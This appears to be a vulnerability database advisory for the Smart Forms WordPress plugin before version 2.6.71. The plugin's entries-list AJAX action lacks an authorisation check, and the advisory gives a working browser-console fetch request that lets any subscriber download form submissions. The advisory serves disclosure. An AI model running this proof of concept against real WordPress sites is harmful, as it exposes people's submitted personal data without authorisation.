Lucene search

K
wpexploitKrzysztof ZającWPEX-ID:2B6B0731-4515-498A-82BD-D416F5885268
HistoryFeb 14, 2022 - 12:00 a.m.

Smart Forms < 2.6.71 - Subscriber+ Form Data Download

2022-02-1400:00:00
Krzysztof Zając
103
smart forms
security exploit
web developer console
browser
subscriber+ form

EPSS

0.001

Percentile

32.8%

The plugin does not have authorisation in its rednao_smart_forms_entries_list AJAX action, allowing any authenticated users, such as subscriber, to download arbitrary form’s data, which could include sensitive information such as PII depending on the form.

Execute the below command in the web developer console of the browser when being logged in as a subscriber:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"rednao_smart_forms_entries_list","data":'{"Form":"1"}'}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));

EPSS

0.001

Percentile

32.8%

Related for WPEX-ID:2B6B0731-4515-498A-82BD-D416F5885268